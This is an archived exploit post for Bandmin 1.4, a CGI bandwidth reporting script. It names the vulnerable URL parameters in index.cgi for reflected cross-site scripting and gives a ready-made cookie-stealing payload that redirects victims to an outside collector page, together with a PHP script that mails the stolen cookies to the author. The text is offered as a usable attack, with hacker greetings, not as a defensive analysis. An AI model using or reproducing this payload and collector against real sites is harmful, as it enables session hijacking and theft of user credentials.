TUCoPS :: Web :: Apps :: bt299.txt

Bandmin 1.4 XSS Exploit




Bandmin 1.4 XSS Exploit by Silent Needle



A:BACKGROUND

Bandmin is a cgi script show you the bandwidth for the sites in the server.



B:DESCRIPTION

The cross site scripting allow you to print a html or javascript or others 

in the webpage

when it just open not write in the page.



C:EXPLOIT

These are the URLs of the exploits:

1-there is two here

http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]

&month=[SECOND SCRIPT]

2-one here

http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=

[THIRD SCRIPT]



And you can steal cookie by changing [*** script] to

<script>document.location='http://any-web-

site/cookies.php?'+document.cookie</script>

and in http://any-web-site/cookie.php put

----------------cookie.php-------------------

<?

mail("silentneedle@hotmail.com","cookies from bandmin",$http_cookie);

echo $http_cookie;

?>

-----------------------------------------------



D:GREETZ

To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN 

AWAY :)



E:CONTACT

Silent Needle

silentneedle@hotmail.com



F:OH LONG NIGHT

Bye

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH